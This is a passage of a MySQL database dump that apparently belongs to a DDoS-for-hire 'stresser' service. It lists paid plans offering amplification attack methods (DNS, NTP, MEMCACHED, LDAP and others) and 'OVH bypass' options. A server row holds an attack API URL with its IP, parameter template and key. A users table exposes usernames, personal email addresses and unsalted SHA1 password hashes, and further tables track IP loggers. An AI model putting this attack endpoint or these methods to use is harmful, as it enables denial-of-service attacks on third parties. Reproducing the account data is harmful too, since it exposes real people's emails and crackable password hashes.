693(7, '3b4356ff26b6354be8b88018b5d04f3d', 2, 7, 1569035057, 1),
694(8, '0dbf36975cc8df9b9b6278616877f848', 4, 8, 1569035433, 1),
695(9, '165560af8cf1c881489d83b0d9c641ac', 4, 9, 1569035892, 1),
696(10, '7637a5030410bff81d8cfa26316402a0', 1, 10, 1569036204, 1),
697(11, 'c899a0d6287be0b4090719ea958325e8', 4, 11, 1569036339, 1),
698(12, '7b01e153970f30323e1a0863beb24782', 4, 12, 1569036394, 1),
699(13, '76054d8a441802b0d7bf14d22069c948', 4, 13, 1569109330, 1),
700(14, '2f4be9fc76f00ef01756c61249903295', 1, 14, 1569109346, 1),
701(15, '505c54c4f43a6e15232e2511a08eb3a8', 4, 15, 1569109392, 1),
702(16, '21b31d1843903fc6a4d42edb408e341a', 1, 16, 1569109402, 1),
703(17, 'd922555572f12c2fa5e44154c6d5ee9e', 1, 17, 1569109483, 1),
704(18, '497244248dfb4de1024aaa114b7b6503', 4, 18, 1569109876, 1),
705(19, '4e7b843c7cff15f8a93ae12972fa0253', 4, 19, 1569110020, 1),
706(20, '9e918fedbf4cc6c3a7ef67fe7df6ab18', 4, 20, 1569110451, 1),
707(21, 'b5509e855a6b0e743ef16f0902ec2d91', 12, 21, 1569114408, 1),
708(22, 'a035c85db7b975c55418c248e08a17d9', 12, 22, 1569114450, 1),
709(23, '5ff26de05265981db3e726e2b1faceee', 14, 23, 1569114964, 1),
710(24, '1b4574ee9c71483dd070aceb37a38863', 14, 24, 1569117169, 1),
711(25, 'f4692b55fb21bc826cf7bc72c80775e3', 4, 25, 1569119521, 1),
712(26, '1b0a527269030a036624a5ca9fe39003', 4, 26, 1569119549, 1),
713(27, '3d59de832dc1224a9a2bc3587d42a3d3', 4, 27, 1569120615, 1),
714(28, 'abcaa1403faa1ab0737c19a9270181ba', 4, 28, 1569120732, 1),
715(29, '440745dfcbeafe155ab926e97ee52706', 4, 29, 1569120835, 1),
716(30, '0263311137addec407edeb4e7a953157', 1, 30, 1569120919, 1),
717(31, '41a8577b63c56d496956b5028b5d11b2', 1, 31, 1569124226, 1),
718(32, 'b30b9d6a15f4867dfe514159b7cdaece', 4, 32, 1569128428, 1),
719(33, '7183eaf1161b2a5723906474e4ac7cfc', 1, 33, 1569128593, 1),
720(34, 'b4729377d1adbe1c840fbeeafd10f3db', 1, 34, 1569129950, 1),
721(35, '54fc6df15770620dfc1dfb60d2b6729e', 1, 35, 1569130077, 1),
722(36, 'b0502f0462cf9152689dd2a15b0a9192', 1, 36, 1569130134, 1),
723(37, '54ff420112d8d19a202f78a7a1c8942c', 1, 37, 1569130187, 1),
724(38, 'b2f40b0b58f2544af36efa2fb0879e1e', 4, 38, 1569171438, 1),
725(39, '0dc4bd45c0a94de15690a1b3cb29ba4f', 1, 39, 1569191254, 1),
726(40, 'aba751fb6db1e8d9304bab76687ea68e', 1, 40, 1569191315, 1),
727(41, '67a2b0142f521a4a6f6ee24bc3e306f9', 1, 41, 1569195487, 1),
728(42, 'c9eac064e62f7da5e7b75e99551f77e7', 18, 42, 1569198236, 1),
729(43, '6d60a16a6ed4e08eddcbf441c8c02612', 18, 43, 1569198471, 1),
730(44, 'b4864d844583f66b9543439cbab809a2', 18, 44, 1569198564, 1),
731(45, 'bc828f4b796c8dcb1270024c8dfd03ea', 18, 45, 1569198873, 1),
732(46, '37019dc994e3d6775bf1e20e7e9e1994', 18, 46, 1569198926, 1),
733(47, '1bd1edf9d00528c2b62f1a931317b56b', 18, 47, 1569199004, 1),
734(48, '10a258d2ad1bcda4df8c9902799120c3', 18, 48, 1569199538, 1),
735(49, 'a3bf9796757ddf1d50f84b5809b26fb0', 18, 49, 1569199619, 1),
736(50, '2e3998e797e621b93e264cfb7c2e048d', 18, 50, 1569199692, 1),
737(51, '82bc31bcad3f6b909f3166d531ec6a74', 18, 51, 1569203699, 1),
738(52, 'c48fb9cef5ab23b33f09bcc70ec9a385', 18, 52, 1569203772, 1),
739(53, '16acd15d1ac8e1f19e88b1a21c8f3e8b', 18, 53, 1569203837, 1),
740(54, 'c5c3152470abfcf8770136a89a3fc871', 18, 54, 1569204020, 1),
741(55, '8a1e0d7ea292e9520ba572ad2eb8d59f', 18, 55, 1569204237, 1),
742(56, 'b9f8e47267f3151430380642cf46806b', 4, 56, 1569207909, 1),
743(57, '4c57d3644e05fc520e722d646d1e0e37', 4, 57, 1569208195, 1),
744(58, 'b8c574b00054d20d316e99f5eda37465', 1, 58, 1569215974, 1),
745(59, '50ee77186d08c5780770658135036c83', 1, 59, 1569216035, 1),
746(60, '97ca23926d11c46981885fced81501bd', 16, 60, 1569216047, 1),
747(61, '0a6a0965ad2e3916bfbf7fef8f07d16b', 1, 61, 1569216090, 1),
748(62, '9d53b9b7062e1a8767881c3bef2efc3a', 1, 62, 1569216151, 1),
749(63, 'cd802f210ba56e454245f03adbddbf1c', 16, 63, 1569216175, 1),
750(64, 'a297048b153cc8b9c02a0e7de8af2fdd', 1, 64, 1569216206, 1),
751(65, '3c83f87cf4086d8b623b5106e41c1294', 1, 65, 1569216281, 1),
752(66, '8802ae1b20be22fbc3f5109772bd9c9d', 12, 66, 1569218356, 1),
753(67, '57f191b54610040f3114bd6b9b0296ed', 16, 67, 1569218508, 1),
754(68, '982d1ac81d9adbe94f5c1f67730c0ece', 1, 68, 1569250988, 1),
755(69, 'c6cd1c43f859e81156be804d47c9687f', 1, 69, 1569252187, 1),
756(70, '32f868fdc2ea78229624dd29df7f8e00', 1, 70, 1569252224, 1),
757(71, '8011d7debd3b865297ed69d015e729e9', 1, 71, 1569258373, 1);
758
759-- --------------------------------------------------------
760
761--
762-- Table structure for table `plans`
763--
764
765CREATE TABLE IF NOT EXISTS `plans` (
766`ID` int(11) NOT NULL,
767 `name` varchar(50) NOT NULL,
768 `description` text NOT NULL,
769 `mbt` int(11) NOT NULL,
770 `max_boots` tinyint(2) NOT NULL DEFAULT '1',
771 `unit` varchar(10) NOT NULL,
772 `length` int(11) NOT NULL,
773 `price` float NOT NULL,
774 `allowed_methods` text
775) ENGINE=MyISAM AUTO_INCREMENT=16 DEFAULT CHARSET=latin1;
776
777--
778-- Dumping data for table `plans`
779--
780
781INSERT INTO `plans` (`ID`, `name`, `description`, `mbt`, `max_boots`, `unit`, `length`, `price`, `allowed_methods`) VALUES
782(8, '[TXTG]', 'TXTG', 86400, 3, 'Years', 1, 900, 'ZAP,DNS,BLUESYN,XMAS,SUDP,TILERA,OVH,VSE,REDSYN,PROWIN,WINSYN,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,UBNT,TELNET,MAC,MEMCACHED,NTP,DOMINATE,BO4BYPASS,FAST,GREENSYN,BLAZIN,URG'),
783(9, '[Starter]', 'JOIN FOR THE NEW BOOTERS', 300, 1, 'Months', 1, 5, 'DNS,LDAP,SSDP,ACK,WIZARD,VOX,NTP,FAST'),
784(10, 'PRO', 'YOU GETTING THERE', 730, 1, 'Months', 1, 9, 'ZAP,DNS,BLUESYN,XMAS,SUDP,LDAP,SSDP,ACK,WIZARD,NTP,FAST,URG'),
785(11, 'EXPERT', 'NOW U SLAMMING', 1000, 1, 'Months', 1, 15, 'ZAP,DNS,XMAS,SUDP,VSE,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,MAC,NTP,DOMINATE,FAST,URG'),
786(12, '[OVH & PLAN] 1', 'Buy This Plan U Will Be Sent OVH', 1300, 2, 'Months', 2, 20, 'ZAP,DNS,BLUESYN,XMAS,SUDP,TILERA,OVH,VSE,REDSYN,PROWIN,WINSYN,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,UBNT,TELNET,MAC,MEMCACHED,NTP'),
787(13, '[OVH & PLAN] 2', 'Get OVH And Have The Power To Hit OVH/NFO', 1600, 2, 'Months', 2, 26, 'ZAP,DNS,BLUESYN,XMAS,SUDP,TILERA,OVH,VSE,REDSYN,PROWIN,WINSYN,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,TELNET,MAC'),
788(14, '[OVH & PLAN] 3 ', 'U Now Have Full Power With An OVH', 2000, 2, 'Months', 2, 30, 'ZAP,DNS,BLUESYN,XMAS,SUDP,TILERA,OVH,VSE,REDSYN,PROWIN,WINSYN,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,UBNT,TELNET,MAC,MEMCACHED,NTP,DOMINATE,BO4BYPASS,FAST,GREENSYN,BLAZIN,URG'),
789(15, '(CUSTOM) 1', 'HMU N U ILL GET A CUSTON PLAY', 2000, 3, 'Months', 2, 20, 'ZAP,DNS,BLUESYN,XMAS,SUDP,TILERA,OVH,VSE,REDSYN,PROWIN,WINSYN,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,UBNT,TELNET,MAC,MEMCACHED,NTP,DOMINATE,BO4BYPASS,FAST,GREENSYN,BLAZIN,URG');
790
791-- --------------------------------------------------------
792
793--
794-- Table structure for table `servers`
795--
796
797CREATE TABLE IF NOT EXISTS `servers` (
798`id` int(11) NOT NULL,
799 `name` varchar(64) NOT NULL,
800 `addr` varchar(128) NOT NULL,
801 `resource` varchar(512) NOT NULL,
802 `description` text,
803 `strength` varchar(256) DEFAULT NULL,
804 `last_used` int(16) NOT NULL,
805 `status` enum('good','caution','gone') NOT NULL DEFAULT 'gone',
806 `delay` varchar(10) NOT NULL DEFAULT '0',
807 `active` enum('0','1') NOT NULL DEFAULT '1'
808) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=latin1;
809
810--
811-- Dumping data for table `servers`
812--
813
814INSERT INTO `servers` (`id`, `name`, `addr`, `resource`, `description`, `strength`, `last_used`, `status`, `delay`, `active`) VALUES
815(12, '2Servers', 'http://147.135.237.1', '/jebobo/server.php?host=%host%&method=%method%&port=%port%&time=%time%&key=TXTG', 'TXTGSTRESSER', '12gbps', 1569258373, 'caution', '0', '1');
816
817-- --------------------------------------------------------
818
819--
820-- Table structure for table `tickets`
821--
822
823CREATE TABLE IF NOT EXISTS `tickets` (
824`id` int(11) NOT NULL,
825 `subject` varchar(64) NOT NULL,
826 `context` text NOT NULL,
827 `status` varchar(30) NOT NULL,
828 `username` varchar(15) NOT NULL,
829 `date` int(16) DEFAULT NULL
830) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=latin1;
831
832--
833-- Dumping data for table `tickets`
834--
835
836INSERT INTO `tickets` (`id`, `subject`, `context`, `status`, `username`, `date`) VALUES
837(3, 'my servers are not connecting', 'test', 'Closed', 'deonteworthen', 1569033110),
838(4, 'my servers are not connecting', 'test', 'Closed', 'deonteworthen', 1569033123),
839(5, 'Hi ', 'Yo ', 'Closed', 'DROPPEDWIFI25', 1569033139),
840(6, 'subject', 'texthere', 'Closed', 'iamtesting', 1569053245),
841(7, 'open', 'open', 'Closed', 'iamtesting', 1569054966),
842(8, 'subject', 'text', 'Closed', 'iamtesting', 1569060532),
843(9, 'subject', 'test', 'Closed', 'iamtesting', 1569060835);
844
845-- --------------------------------------------------------
846
847--
848-- Table structure for table `users`
849--
850
851CREATE TABLE IF NOT EXISTS `users` (
852`ID` int(11) NOT NULL,
853 `username` varchar(26) NOT NULL,
854 `password` varchar(40) NOT NULL,
855 `email` varchar(50) NOT NULL,
856 `rank` int(11) NOT NULL DEFAULT '0',
857 `membership` int(11) NOT NULL,
858 `max_boots` tinyint(2) NOT NULL DEFAULT '0',
859 `expire` int(11) NOT NULL,
860 `status` int(11) NOT NULL,
861 `test_boot` int(16) DEFAULT NULL
862) ENGINE=MyISAM AUTO_INCREMENT=32 DEFAULT CHARSET=latin1;
863
864--
865-- Dumping data for table `users`
866--
867
868INSERT INTO `users` (`ID`, `username`, `password`, `email`, `rank`, `membership`, `max_boots`, `expire`, `status`, `test_boot`) VALUES
869(1, 'txtgleader', '3a9f35139ab437b00ee9395e7dc611c55a527962', 'txtgserver123@gmail.com', 1, 8, 0, 1600731648, 0, NULL),
870(2, 'undoxity', '14e68b0c45ebe2bba4c9c4706ff08f602802729e', 'undoxity@undoxity.undoxity', 1, 8, 0, 1600731668, 0, NULL),
871(3, 'TXTGNotLackin', '8f36fc080fd9581613e72e35afb3df40c74889a8', 'Koryman3@gmail.com', 0, 4, 0, 1632191711, 0, NULL),
872(4, 'deonteworthen', 'c522c3c25b5876ecf0b8435594883956db9a112a', 'deonteworthen45@gmail.com', 0, 8, 0, 1600731630, 0, NULL),
873(5, 'DROPPEDWIFI25', '8366d2b1a8a75b792c22632380b4bb409bcae287', 'Johnsonkemonty@gmail.com', 0, 4, 0, 1632191735, 0, NULL),
874(6, 'undoxitytest', '14e68b0c45ebe2bba4c9c4706ff08f602802729e', 'undoxitytest@gmail.com', 0, 0, 0, 0, 0, NULL),
875(7, 'Anonymous123', '4970d47daf0d8c0cec471e29063640fa6900f109', 'bigdadaylouvcscuck@cuckme.com', 0, 0, 0, 0, 0, NULL),
876(8, 'harmz', '07ee54b7a941698180c8b3956ff5fc44da3296e9', 'ndfanarchy@gmail.com', 0, 0, 0, 0, 0, NULL),
877(9, 'UltraFerrox', 'd84646d0c3f2cf65840883947a0127852b864371', 'wlbferrox@gmail.com', 0, 0, 0, 0, 0, NULL),
878(10, 'Chubu', '11306465f1be036909d8d56ab42e184da9b78a1f', 'Marque006@icloud.com', 0, 0, 0, 0, 0, NULL),
879(11, 'iamtesting', 'a516ac182010af74b262361cde1aa2200be80deb', 'lol@lol.com', 0, 0, 0, 0, 0, NULL),
880(12, 'CaronModzAll', 'ec5ef1f7afbc3efb1d2a34efce7e5cde67dd39fc', 'justingmodz0922@gmail.com', 0, 9, 0, 1571706334, 0, NULL),
881(13, 'InsanityBoii', 'e91079668e34c7460a04cb149ad2944427c44884', 'jadelo@bellsouth.net', 0, 0, 0, 0, 0, NULL),
882(14, 'TxtgH3ADSHOT', '6d9633ddbf3c7649164d343feab0aef6a84d9af5', 'Txtggang24@gmail.com', 0, 8, 0, 1600735282, 0, NULL),
883(15, 'Davezn6', '9cb3b9075f3e4a8b2697d9a9d2de67b3c7e62129', 'ducttape336@gmail.com', 0, 0, 0, 0, 0, NULL),
884(16, 'treyyoung', '8be158338a7d5dbb83b10fe8627da5d4e6d147b7', 'txtggang17@yopmail.com', 0, 8, 0, 1600741950, 0, NULL),
885(17, 'TXTGQueen', 'acbc653fe26427498cbae866b0dcd9a7f5ff419d', 'breezy7984@gmail.com', 0, 8, 0, 1600742914, 0, NULL),
886(18, 'Frosty', '9a749ca9f9f50ad98965cf6e6f80674d075077ad', 'flakesfrosty24@gmail.com', 0, 14, 0, 1574472573, 0, NULL),
887(19, 'V2680', '0fb2123376ad529ab325c8eb1cb87e4d17fe48e0', 'V2680l@protonmail.com', 0, 0, 0, 0, 0, NULL),
888(20, 'Turn', '721bc55662bf83896a513906ccd6c1f7a42ef9e5', 'Katesmall395@gmail.com', 0, 0, 0, 0, 0, NULL),
889(21, 'ShalXBL', '7dee76d7016d3837ef4fa281f75c255163c24a58', 'shalgfx420@gmail.com', 0, 0, 0, 0, 0, NULL),
890(22, 'Diamondshot', '833e9d618290f0da41af28bd621628b504a894da', 'TxtgDiamondshot21@gmail.com', 0, 0, 0, 0, 0, NULL),
891(23, 'Vivian', 'd886b32901097b42c49cb6bc69d79e0e6301cc3c', 'cybermandex420@protonmail.com', 0, 0, 0, 0, 0, NULL),
892(24, 'Stadics', '4a0e2c5405a242252e1c1b039cb0be2c1ce30c27', 'xrayleo9@gmail.com', 0, 0, 0, 0, 0, NULL),
893(25, 'acaudill7', '8df59a5db9d8ff69fafe883a6a7d826358ec7e45', 'syrnpanda@gmail.com', 0, 0, 0, 0, 0, NULL),
894(26, 'loler44', '004d0c112fb9325a77799b73d67d90bd249522d9', 'elderscrollsguy12@gmail.com', 0, 0, 0, 0, 0, NULL),
895(27, 'tylerj101998', 'bf906f284b5cddd4b04efde3c4ba001252ca764e', 'tylerj101998badass@gmail.com', 0, 0, 0, 0, 0, NULL),
896(28, 'zxntrix', '223e0ad70fbd77109e7ece8878eeb752f82c57db', 'zxntrix@gmail.com', 0, 0, 0, 0, 0, NULL),
897(29, 'BluesBros0511', 'e8d86e86aeebbd5e94950f28113d9fb7546c56bc', 'Joshuadavis09@gmail.com', 0, 0, 0, 0, 0, NULL),
898(30, 'Uk720', '212b73a4f870fd48c84d1f3909ad5bd2b0ec820d', 'Uk720@gmail.com', 0, 0, 0, 0, 0, NULL),
899(31, 'youregoingdown', '2e13c3a7723ca3b13fc1a8f7150882c8c6e739dd', 'youregoingdown@gg.net', 0, 0, 0, 0, 0, NULL);
900
901-- --------------------------------------------------------
902
903--
904-- Table structure for table `users_fucked`
905--
906
907CREATE TABLE IF NOT EXISTS `users_fucked` (
908`ID` int(11) NOT NULL,
909 `username` varchar(26) NOT NULL,
910 `password` varchar(40) NOT NULL,
911 `email` varchar(50) NOT NULL,
912 `rank` int(11) NOT NULL DEFAULT '0',
913 `membership` int(11) NOT NULL,
914 `max_boots` tinyint(2) NOT NULL DEFAULT '0',
915 `expire` int(11) NOT NULL,
916 `status` int(11) NOT NULL,
917 `test_boot` int(16) DEFAULT NULL
918) ENGINE=MyISAM DEFAULT CHARSET=latin1;
919
920-- --------------------------------------------------------
921
922--
923-- Table structure for table `users_loggers`
924--
925
926CREATE TABLE IF NOT EXISTS `users_loggers` (
927`id` int(11) NOT NULL,
928 `logger_id` int(11) NOT NULL,
929 `user_id` int(11) NOT NULL,
930 `name` varchar(64) DEFAULT NULL,
931 `minified_url` varchar(256) DEFAULT NULL,
932 `date` int(16) NOT NULL
933) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
934
935--
936-- Dumping data for table `users_loggers`
937--
938
939INSERT INTO `users_loggers` (`id`, `logger_id`, `user_id`, `name`, `minified_url`, `date`) VALUES
940(1, 4, 4, 'lol', NULL, 1569034259);
941
942--
943-- Indexes for dumped tables
944--
945
946--
947-- Indexes for table `blacklist`
948--
949ALTER TABLE `blacklist`
950 ADD PRIMARY KEY (`ID`);
951
952--
953-- Indexes for table `boot_methods`
954--
955ALTER TABLE `boot_methods`
956 ADD UNIQUE KEY `method` (`method`);
957
958--
959-- Indexes for table `fe`
960--
961ALTER TABLE `fe`
962 ADD PRIMARY KEY (`ID`);
963
964--
965-- Indexes for table `iplogs`
966--
967ALTER TABLE `iplogs`
968 ADD PRIMARY KEY (`ID`), ADD KEY `ID` (`ID`);
969
970--
971-- Indexes for table `loggers`
972--
973ALTER TABLE `loggers`
974 ADD PRIMARY KEY (`logger_id`), ADD UNIQUE KEY `address` (`address`);
975
976--
977-- Indexes for table `loggers_ips`
978--
979ALTER TABLE `loggers_ips`
980 ADD PRIMARY KEY (`id`);
981
982--
983-- Indexes for table `login_history`
984--
985ALTER TABLE `login_history`
986 ADD PRIMARY KEY (`id`), ADD KEY `username` (`username`,`ip`);
987
988--
989-- Indexes for table `logs`
990--
991ALTER TABLE `logs`
992 ADD PRIMARY KEY (`ID`);
993
994--
995-- Indexes for table `messages`
996--
997ALTER TABLE `messages`
998 ADD PRIMARY KEY (`messageid`);
999
1000--
1001-- Indexes for table `news`
1002--
1003ALTER TABLE `news`
1004 ADD PRIMARY KEY (`ID`);
1005
1006--
1007-- Indexes for table `payments`
1008--
1009ALTER TABLE `payments`
1010 ADD PRIMARY KEY (`ID`);
1011
1012--
1013-- Indexes for table `ping_tokens`
1014--
1015ALTER TABLE `ping_tokens`
1016 ADD PRIMARY KEY (`pt_id`), ADD UNIQUE KEY `token` (`token`);
1017
1018--
1019-- Indexes for table `plans`
1020--
1021ALTER TABLE `plans`
1022 ADD PRIMARY KEY (`ID`);
1023
1024--
1025-- Indexes for table `servers`
1026--
1027ALTER TABLE `servers`
1028 ADD PRIMARY KEY (`id`), ADD KEY `name` (`name`,`addr`);
1029
1030--
1031-- Indexes for table `tickets`
1032--
1033ALTER TABLE `tickets`
1034 ADD PRIMARY KEY (`id`);
1035
1036--
1037-- Indexes for table `users`
1038--
1039ALTER TABLE `users`
1040 ADD PRIMARY KEY (`ID`), ADD KEY `ID` (`ID`);
1041
1042--
1043-- Indexes for table `users_fucked`
1044--
1045ALTER TABLE `users_fucked`
1046 ADD PRIMARY KEY (`ID`), ADD KEY `ID` (`ID`);
1047
1048--
1049-- Indexes for table `users_loggers`
1050--
1051ALTER TABLE `users_loggers`
1052 ADD PRIMARY KEY (`id`);
1053
1054--
1055-- AUTO_INCREMENT for dumped tables
1056--
1057
1058--
1059-- AUTO_INCREMENT for table `blacklist`
1060--
1061ALTER TABLE `blacklist`
1062MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT;
1063--
1064-- AUTO_INCREMENT for table `fe`
1065--
1066ALTER TABLE `fe`
1067MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT;
1068--
1069-- AUTO_INCREMENT for table `iplogs`
1070--
1071ALTER TABLE `iplogs`
1072MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT;
1073--
1074-- AUTO_INCREMENT for table `loggers`
1075--
1076ALTER TABLE `loggers`
1077MODIFY `logger_id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=6;
1078--
1079-- AUTO_INCREMENT for table `loggers_ips`
1080--
1081ALTER TABLE `loggers_ips`
1082MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=3;
1083--
1084-- AUTO_INCREMENT for table `login_history`
1085--
1086ALTER TABLE `login_history`
1087MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=119;
1088--
1089-- AUTO_INCREMENT for table `logs`
1090--
1091ALTER TABLE `logs`
1092MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=72;
1093--
1094-- AUTO_INCREMENT for table `messages`
1095--
1096ALTER TABLE `messages`
1097MODIFY `messageid` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=211;
1098--
1099-- AUTO_INCREMENT for table `news`
1100--
1101ALTER TABLE `news`
1102MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=2;
1103--
1104-- AUTO_INCREMENT for table `payments`
1105--
1106ALTER TABLE `payments`
1107MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT;
1108--
1109-- AUTO_INCREMENT for table `ping_tokens`
1110--
1111ALTER TABLE `ping_tokens`
1112MODIFY `pt_id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=72;
1113--
1114-- AUTO_INCREMENT for table `plans`
1115--
1116ALTER TABLE `plans`
1117MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=16;
1118--
1119-- AUTO_INCREMENT for table `servers`
1120--
1121ALTER TABLE `servers`
1122MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=13;
1123--
1124-- AUTO_INCREMENT for table `tickets`
1125--
1126ALTER TABLE `tickets`
1127MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=10;
1128--
1129-- AUTO_INCREMENT for table `users`
1130--
1131ALTER TABLE `users`
1132MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=32;
1133--
1134-- AUTO_INCREMENT for table `users_fucked`
1135--
1136ALTER TABLE `users_fucked`
1137MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT;
1138--
1139-- AUTO_INCREMENT for table `users_loggers`
1140--
1141ALTER TABLE `users_loggers`
1142MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=2;
1143/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
1144/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
1145/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;